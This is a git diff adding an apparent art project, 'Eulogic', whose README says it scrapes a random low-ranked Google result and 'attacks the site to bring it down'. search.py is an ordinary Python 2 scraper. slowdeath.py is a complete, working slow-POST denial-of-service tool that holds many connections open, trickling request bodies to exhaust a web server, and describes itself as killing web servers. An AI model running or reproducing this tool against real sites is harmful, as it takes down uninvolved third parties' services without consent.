diff --git a/README b/README
new file mode 100644
index 0000000..d01d767
--- /dev/null
+++ b/README
@@ -0,0 +1,4 @@
+Eulogic searches Google, collects the least relevant results, picks one at random, scrapes its text, attacks the site to bring it down, and delivers the site's content as a eulogy.
+
+Alexandar Kozovski
+Johann Diedrick
\ No newline at end of file
diff --git a/search.py b/search.py
new file mode 100644
index 0000000..1fa2700
--- /dev/null
+++ b/search.py
@@ -0,0 +1,111 @@
+import urllib2
+import simplejson
+import re
+import requests
+from bs4 import BeautifulSoup
+from random import choice
+
+# Take a search term, query Google, jump to the lowest-ranked results,
+# pick one at random, scrape it and print its text.
+
+# Helpers to use if we want to control the size of the parsed strings:
+# from bs4 import SoupStrainer
+# only_a_tags = SoupStrainer("a")
+# only_tags_with_id_link2 = SoupStrainer(id="link2")
+#
+# def is_short_string(string):
+#     return len(string) < 10
+#
+# only_short_strings = SoupStrainer(text=is_short_string)
+
+# The request also includes the userip parameter, which provides the end
+# user's IP address. Doing so helps distinguish this legitimate
+# server-side traffic from traffic that doesn't come from an end user.
+
+query = "hotdog"  # dynamic id from the site, sent in a POST request
+url = ('https://ajax.googleapis.com/ajax/services/search/web'
+       '?v=1.0&q=' + query + '&userip=USERS-IP-ADDRESS')
+
+request = urllib2.Request(url, None, {'Referer': "www.google.com"})
+response = urllib2.urlopen(request)  # open the search URL
+
+# Process the JSON response.
+results = simplejson.load(response)
+results = results["responseData"]
+results = results['cursor']
+nofResults = results["resultCount"]
+
+# Pagination offset: divide the total result count so we land deep in the
+# result pages, where the least relevant hits live.
+nom = long(nofResults.replace(",", "")) / 10000
+print "Results searched....", nom
+
+results = results["moreResultsUrl"]
+
+# Rewrite the "start=0" pagination parameter with our offset.
+split = re.split("start=0", results)
+newurl = split[0] + "start=" + str(nom) + split[1]
+print "found!!! " + newurl
+
+r = requests.get(newurl)
+# print r.status_code
+# print r.headers['content-type']
+
+soup = BeautifulSoup(r.text, "html.parser")
+
+# Collect every href on the results page.
+links = []
+for link in soup.find_all("a"):
+    href = link.get("href")
+    if href:
+        links.append(href)
+
+# Google wraps each result in a "/url?q=..." redirect; pull out the real URLs.
+listOfUrls = []
+for s in links:
+    if "/url?" in s:
+        split1 = re.split("&", s)
+        split2 = split1[0].split("=", 1)
+        if len(split2) > 1:
+            listOfUrls.append(split2[1])
+
+
+def myloop(listOfUrls):
+    # Pick a random result, scrape it, and fall back to another on failure.
+    if not listOfUrls:
+        return
+    deathUrl = choice(listOfUrls)
+    listOfUrls.remove(deathUrl)
+    print "Dying! " + deathUrl
+    try:
+        death = urllib2.urlopen(deathUrl).read()
+        deathSoup = BeautifulSoup(death, "html.parser")
+        # stripped_strings yields the page text with surrounding whitespace
+        # removed; repr() keeps unicode printable on the terminal.
+        for string in deathSoup.stripped_strings:
+            tocontextfree = repr(string)
+            print tocontextfree
+    except Exception:  # includes urllib2.HTTPError and urllib2.URLError
+        print "I love errors"
+        print deathUrl
+        return myloop(listOfUrls)
+
+
+myloop(listOfUrls)
+print 'end'
diff --git a/slowdeath.py b/slowdeath.py
new file mode 100755
index 0000000..696c02d
--- /dev/null
+++ b/slowdeath.py
@@ -0,0 +1,97 @@
+#!/usr/bin/env python
+
+from optparse import OptionParser
+from urlparse import urlparse
+from time import sleep
+import socket
+import threading
+
+
+def openConnections(url, threads, sleepTime):
+    urlParts = urlparse(url)
+    if urlParts.scheme != 'http':
+        raise Exception('Only the http protocol is currently supported')
+
+    port = urlParts.port
+    if port is None:
+        port = 80
+
+    path = urlParts.path or '/'
+
+    print "Opening %d sockets to %s:%d" % (threads, urlParts.hostname, port)
+
+    pool = []
+
+    try:
+        for i in range(threads):
+            t = Worker(urlParts.hostname, port, path, sleepTime)
+            pool.append(t)
+            t.start()
+
+        print "Started %d threads. Hit ctrl-c to exit" % (threads)
+
+        while True:
+            sleep(1)
+
+    except KeyboardInterrupt:
+        print "\nCaught keyboard interrupt. Stopping all threads"
+
+    for worker in pool:
+        worker.stop()
+    for worker in pool:
+        worker.join()
+
+
+class Worker(threading.Thread):
+    def __init__(self, host, port, path, sleepTime):
+        self.host = host
+        self.port = port
+        self.path = path
+        self.sleepTime = sleepTime
+        self.stopped = False
+        threading.Thread.__init__(self)
+
+    def stop(self):
+        self.stopped = True
+
+    def run(self):
+        # Send the headers of a large POST, then trickle the body out so
+        # slowly that the server keeps the connection (and a worker) tied up.
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.connect((self.host, self.port))
+        s.settimeout(1)
+        s.send(
+            'POST ' + self.path + ' HTTP/1.1\r\n' +
+            'Host: ' + self.host + '\r\n' +
+            'Connection: close\r\n' +
+            'Content-Length: 1000000\r\n' +
+            '\r\n'
+        )
+
+        try:
+            while not self.stopped:
+                s.send('abc=123&')
+                sleep(self.sleepTime / 1000.0)
+        except socket.error:
+            pass  # the server closed the connection; let the thread exit
+
+        s.close()
+
+
+def main():
+    parser = OptionParser(
+        version="slowdeath v0.1",
+        description="Kills web servers by keeping many connections open, avoiding timeouts.",
+        usage="usage: %prog [options] url",
+    )
+    parser.add_option(
+        '-t', '--threads',
+        help="Number of connections to keep open (default = 100)",
+        type="int",
+        dest="threads",
+        default=100
+    )
+    parser.add_option(
+        '-s', '--sleep',
+        help="Time between packets in milliseconds (default = 1000)",
+        type="int",
+        dest="sleepTime",
+        default=1000
+    )
+
+    options, args = parser.parse_args()
+
+    if len(args) < 1:
+        parser.error("This utility requires at least 1 argument")
+
+    url = args[0]
+
+    openConnections(url, options.threads, options.sleepTime)
+
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file